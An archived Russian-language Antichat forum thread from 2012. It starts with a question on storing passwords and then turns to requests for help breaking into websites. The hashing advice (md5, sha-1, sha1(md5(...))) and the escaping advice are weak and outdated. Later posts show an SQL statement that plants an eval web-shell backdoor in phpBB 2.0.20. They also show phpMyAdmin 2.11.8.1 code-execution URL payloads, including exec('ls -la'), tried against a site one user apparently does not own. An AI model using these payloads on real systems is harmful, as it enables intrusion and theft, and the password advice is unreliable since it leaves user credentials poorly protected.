ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
23.07.2012, 15:26
|
|
Guest
Сообщений: n/a
Провел на форуме:
660
Репутация:
0
|
|
Сообщение от Kruzak
Kruzak said:
Подскажите пожалуйста как вводить и хранить пароли юзеров в mysql?
у меня скрипт, есть регистрация. как при регистрации сохранять пароли в бд? фильтровать что-нибудь надо?
Главное не хранить в открытом виде, а хранить в виде хеш свертки, к примеру md5, sha-1 и т.п.
Если ты приверженец защиты своих юзеров, то безопаснее с точки зрения невозможности раскрытия их паролей хранить их в БД к примеру в виде sha1(md5($password, $salt)) или что-то подобное.
|
|
|
|
23.07.2012, 15:54
|
|
Guest
Сообщений: n/a
Провел на форуме:
30362
Репутация:
1
|
|
ну это понятно, меня больше интересует возможно ли как нибудь сделать sql inj при регистрации
|
|
|
|
23.07.2012, 16:18
|
|
Постоянный
Регистрация: 13.12.2008
Сообщений: 354
Провел на форуме:
1747641
Репутация:
175
|
|
Сообщение от Kruzak
Kruzak said:
ну это понятно, меня больше интересует возможно ли как нибудь сделать sql inj при регистрации
Строковые параметры, которые передаешь в SQL запрос из скрипта, обрабатывай функцией mysql_real_escape_string. Те параметры, которые должны быть целочисленными, приводи к типу int. После этого инъекций не будет.
|
|
|
24.07.2012, 07:01
|
|
Познающий
Регистрация: 25.10.2007
Сообщений: 46
Провел на форуме:
318186
Репутация:
2
|
|
Заранее сорри если миллион раз обсуждалось = \
Собсно вопрос по заливке шелла в phpbb 2.0.20
Вообщем гуглил, и находил только один способ... через востановление бд
FILE_P > Y
Вообщем создаю файл 1.sql в нем код:
Сообщение от None
UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:eval(stripslashes($_REQUEST[c]));' WHERE user_id=2;
Востанавливаю БД. Пишет востановилась...
захожу..
http://forum/profile.php?mode=editprofile&с=phpinfo();
phpinfo не выводится = \ что не так ???
help... или подскажите еще какой способ заливки)
Не пинать сильно) давно не занимался такими делами) |
|
|
|
24.07.2012, 09:48
|
|
Познающий
Регистрация: 17.04.2009
Сообщений: 59
Провел на форуме:
401944
Репутация:
37
|
|
Сообщение от GroM88
GroM88 said:
Заранее сорри если миллион раз обсуждалось = \
Собсно вопрос по заливке шелла в phpbb 2.0.20
Вообщем гуглил, и находил только один способ... через востановление бд
FILE_P > Y
Вообщем создаю файл 1.sql в нем код:
Востанавливаю БД. Пишет востановилась...
захожу..
http://forum/profile.php?mode=editprofile&с=phpinfo();
phpinfo не выводится = \ что не так ???
help... или подскажите еще какой способ заливки)
Не пинать сильно) давно не занимался такими делами)
ID у юзера, за которого ты залогинен - 2?
|
|
|
|
24.07.2012, 12:48
|
|
Познающий
Регистрация: 25.10.2007
Сообщений: 46
Провел на форуме:
318186
Репутация:
2
|
|
да, 2
еще вопрос, как в phpbb 2.0.20 раскрыть пути?)
Курил форум) много чего пробовал) не помогло = \
|
|
|
|
24.07.2012, 22:01
|
|
Guest
Сообщений: n/a
Провел на форуме:
11466
Репутация:
3
|
|
Есть сайт, на нем phpMyAdmin 2.11.8.1
Уязвимость описана к нему тут _/showpost.php?p=871193&postcount=5
Заюзал ее, но что должно произойти? Я так так понимаю на экран должен выпать пасс и логин? Не чиго не происходит
Что я не так делаю?
Там кое что стоящее , если что могу поделиться .
В общем прошу направить меня!!
|
|
|
|
24.07.2012, 22:04
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 80
Провел на форуме:
1180165
Репутация:
11
|
|
Сообщение от WendM
WendM said:
Есть сайт, на нем phpMyAdmin 2.11.8.1
Уязвимость описана к нему тут _/showpost.php?p=871193&postcount=5
Заюзал ее, но что должно произойти? Я так так понимаю на экран должен выпать пасс и логин? Не чиго не происходит
Что я не так делаю?
Там кое что стоящее , если что могу поделиться
.
В общем прошу направить меня!!
Сообщение от None
Выполнение произвольного PHP-кода на сервере, включая вызов внешних команд через PHP-функцию exec().
Код:
Code:
http://www.example.com/server_databases.php?pos=0&dbstats=0&sort_by="]) OR "PHP" //&sort_order=desc&token=[valid token]
|
|
|
|
24.07.2012, 22:34
|
|
Guest
Сообщений: n/a
Провел на форуме:
11466
Репутация:
3
|
|
Сообщение от wkar
wkar said:
Код:
Code:
http://www.example.com/server_databases.php?pos=0&dbstats=0&sort_by="]) OR "PHP" //&sort_order=desc&token=[valid token]
Спасиб за ответ, но что то не идет. Пробывал вызвать phpinfo()
Так
Код:
Code:
/server_databases.php?pos=0&dbstats=0&sort_by="]) OR //&sort_order=desc&token=[valid token]
и так
Код:
Code:
/server_databases.php?pos=0&dbstats=0&sort_by="]) OR phpinfo(); //&sort_order=desc&token=[valid token]
и так
Код:
Code:
/server_databases.php?pos=0&dbstats=0&sort_by="]) OR phpinfo() //&sort_order=desc&token=[valid token]
Но результат нулевой
Что я не так делаю?
Token получаю так, ввожу левый пасс и логин, выдает ошибку но в браузерной строке есть токен, его и юзаю
|
|
|
|
24.07.2012, 22:38
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 80
Провел на форуме:
1180165
Репутация:
11
|
|
попробуй
Код:
Code:
server_databases.php?pos=0&dbstats=0&sort_by="]) OR exec('ls -la'); //&sort_order=desc&token=[valid token]
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
